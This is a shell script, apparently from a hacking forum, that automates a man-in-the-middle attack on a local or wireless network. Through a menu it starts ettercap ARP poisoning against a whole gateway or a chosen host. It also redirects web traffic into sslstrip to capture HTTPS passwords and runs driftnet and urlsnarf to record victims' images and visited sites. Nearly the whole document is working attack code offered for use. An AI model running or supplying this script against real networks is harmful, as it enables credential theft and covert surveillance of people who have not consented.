Man In the Middle Attack

1. #!/bin/sh
2. clear
3. # This cript was written by me n1tr0g3n with a lot of input from R4V3N747700 and help from all the guys on the Top-Hat-Sec.com Forum.
4. #Thanks to TAPE for his input and suggestions which were utilized into the script to make it more functional. And a #special thanks to my lovely girlfriend who puts up with me being on the #computer all the time, I love you with all my #heart. We do this for the security community and hope you guys enjoy our work. Thanks for using the script and we hope #it #works wel #for you.
5. echo
6. echo ""
7. echo ""
8. echo ""
9. echo ""
10. echo ""
11. echo "                             n1tr0g3n's all in one Network Sniffer";
12. echo ""
13. echo "                                 coded with help by R4V3N747700"
14. echo ""
15. echo "                             www.n1tr0g3n.com & www.Top-Hat-Sec.com";
16.  
17.  
18. sleep 3
19. clear
20. echo ""
21. echo ""
22. echo "--------------------------------------------------------------------------------------------------"
23. echo "A bunch of Xterm windows will open on top of eachother so just spread them out across your screen";
24. echo "--------------------------------------------------------------------------------------------------"
25. echo ""
26. echo "                       If SSLstrip gives you errors please rerun the script"
27. echo ""
28. echo "              when done with the attack click ENTER in the ettercap window to cleanup"
29. echo ""
30. echo ""
31. sleep 4
32. clear
33.  
34.  
35. #This command will ask you for your interface name
36. echo
37. echo "                       Please type the name of your network interface in below";
38. read IFACE;
39. sleep 2
40. echo ""
41. echo ""
42. clear
43. echo ""
44. echo " ----------------------------------------------------------------------------------"
45. echo ""
46. echo " |-----------------------------------| |-----------------------------------|"
47. echo " |        Attack Entire Gateway      | |      Attack single host           |"
48. echo " |     1 For LAN attack              | | 3 For LAN attack                  |"
49. echo " |                                   | |                                   |"
50. echo " |     2 For Wireless Attack         | | 4 For Wireless Attack             |"
51. echo " |-----------------------------------| |-----------------------------------|"
52. echo ""
53. echo " ----------------------------------------------------------------------------------"
54. echo ""
55. echo ""
56. echo ""
57. echo " Select Menu Option: "
58. read menuoption
59. if [ $menuoption = "1" ]; then
60.  
61. echo "This should be your Gateway from what I see: "
62. route -n | grep 'UG[ \t]' | awk '{print $2}'
63. echo ""
64. echo ""
65. echo "Please type the IP of your Gateway in below";
66. read GATEWAY;
67. echo ""
68. echo ""
69. echo "Starting attack on Gateway"
70. route -n | grep 'UG[ \t]' | awk '{print $2}'
71. sleep 2
72. #This will allow you to forward packets from the router
73. echo "1" > /proc/sys/net/ipv4/ip_forward
74.  
75.  
76. #This will start driftnet to capture images on your computer
77. sudo xterm -e driftnet -i $IFACE &
78.  
79.  
80. #This will start URLSnarf to show the websites the victim browses
81. sudo xterm -e urlsnarf -i $IFACE &
82.  
83.  
84. #this command will set up all redirection
85. sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
86.  
87.  
88. #This command will start ettercap
89. ettercap -TqM ARP:REMOTE // // &
90.  
91.  
92. #This command will start SSLStrip to start sniffing https:// passwords
93. sudo xterm -e sslstrip -a -l 10000 &
94. echo
95. echo "Press ENTER to stop session"
96. read ENTERKEY
97.  
98. killall sslstrip
99. killall ettercap
100. killall urlsnarf
101. killall xterm
102. echo "0" > /proc/sys/net/ipv4/ip_forward
103. iptables --flush
104. iptables --table nat --flush
105. iptables --delete-chain
106. iptables --table nat --delete-chain
107. else
108.  
109. if [ $menuoption = "2" ]; then
110.  
111. #This will allow you to forward packets from the router
112. echo "This should be your gateway from what I see: "
113. route -n | grep 'UG[ \t]' | awk '{print $2}'
114. echo ""
115. echo ""
116. echo "Please type the IP of your gateway in below";
117. read GATEWAY;
118. echo ""
119.  
120. echo "Starting attack on gateway"
121. route -n | grep 'UG[ \t]' | awk '{print $2}'
122. sleep 2
123.  
124.  
125. echo "1" > /proc/sys/net/ipv4/ip_forward
126.  
127.  
128. #This will start driftnet to capture images on your computer
129. sudo xterm -e driftnet -i $IFACE &
130.  
131.  
132. #This will start URLSnarf to show the websites the victim browses
133. sudo xterm -e urlsnarf -i $IFACE &
134.  
135.  
136. #this command will set up all redirection
137. sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
138.  
139.  
140. #This command will start ettercap
141. ettercap -Tq -i $IFACE -M arp:remote /$GATEWAY/ // &
142. #sudo xterm -e ettercap -TqM ARP:REMOTE // // & -----> command for LAN
143.  
144.  
145. #This command will start SSLStrip to start sniffing https:// passwords
146. sudo xterm -e sslstrip -a -l 10000 &
147.  
148.  
149. echo "Press ENTER to stop session"
150. read ENTERKEY
151.  
152. killall sslstrip
153. killall ettercap
154. killall urlsnarf
155. killall xterm
156. echo "0" > /proc/sys/net/ipv4/ip_forward
157. iptables --flush
158. iptables --table nat --flush
159. iptables --delete-chain
160. iptables --table nat --delete-chain
161. else
162.  
163. if [ $menuoption = "3" ]; then
164. #This will allow you to forward packets from the router
165. echo ""
166. echo ""
167. echo "This should be your gateway from what I see: "
168. route -n | grep 'UG[ \t]' | awk '{print $2}'
169. echo ""
170. echo ""
171. echo "Please type the IP of your gateway in below";
172. read GATEWAY3;
173. echo ""
174. echo ""
175. echo "Please type the IP of the target host below";
176. read HOST3;
177. echo ""
178. echo ""
179. echo " Starting Attack on Target Host"
180. sleep 2
181.  
182.  
183. echo "1" > /proc/sys/net/ipv4/ip_forward
184.  
185.  
186. #This will start driftnet to capture images on your computer
187. sudo xterm -e driftnet -i $IFACE &
188.  
189.  
190. #This will start URLSnarf to show the websites the victim browses
191. sudo xterm -e urlsnarf -i $IFACE &
192.  
193.  
194. #this command will set up all redirection
195. sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
196.  
197.  
198. #This command will start ettercap
199. ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &
200.  
201.  
202. #This command will start SSLStrip to start sniffing https:// passwords
203. xterm -e sslstrip -a -l 10000 &
204.  
205. echo "Press ENTER to stop session"
206. read ENTERKEY
207.  
208. killall sslstrip
209. killall ettercap
210. killall urlsnarf
211. killall xterm
212. echo "0" > /proc/sys/net/ipv4/ip_forward
213. iptables --flush
214. iptables --table nat --flush
215. iptables --delete-chain
216. iptables --table nat --delete-chain
217. else
218.  
219. if [ $menuoption = "4" ]; then
220. #This will allow you to forward packets from the router
221. echo ""
222. echo ""
223. echo "This should be your Gateway from what I see: "
224. route -n | grep 'UG[ \t]' | awk '{print $2}'
225. echo ""
226. echo ""
227. echo "Please type the IP of your gateway in below";
228. read GATEWAY4;
229. echo ""
230. echo ""
231. echo "Please type the IP of the target host below";
232. read HOST4;
233. echo ""
234. echo ""
235. echo " Starting Attack on Target Host"
236. sleep 2
237.  
238.  
239. echo "1" > /proc/sys/net/ipv4/ip_forward
240.  
241.  
242. #This will start driftnet to capture images on your computer
243. sudo xterm -e driftnet -i $IFACE &
244.  
245.  
246. #This will start URLSnarf to show the websites the victim browses
247. sudo xterm -e urlsnarf -i $IFACE &
248.  
249.  
250. #this command will set up all redirection
251. sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
252.  
253.  
254. #This command will start ettercap
255. ettercap -Tq -i $IFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &
256.  
257.  
258. #This command will start SSLStrip to start sniffing https:// passwords
259. sudo xterm -e sslstrip -a -l 10000 &
260.  
261.  
262. echo "Press ENTER to stop session"
263. read ENTERKEY
264.  
265. killall sslstrip
266. killall ettercap
267. killall urlsnarf
268. killall xterm
269. echo "0" > /proc/sys/net/ipv4/ip_forward
270. iptables --flush
271. iptables --table nat --flush
272. iptables --delete-chain
273. iptables --table nat --delete-chain
274.  
275. fi
276. fi
277. fi
278. fi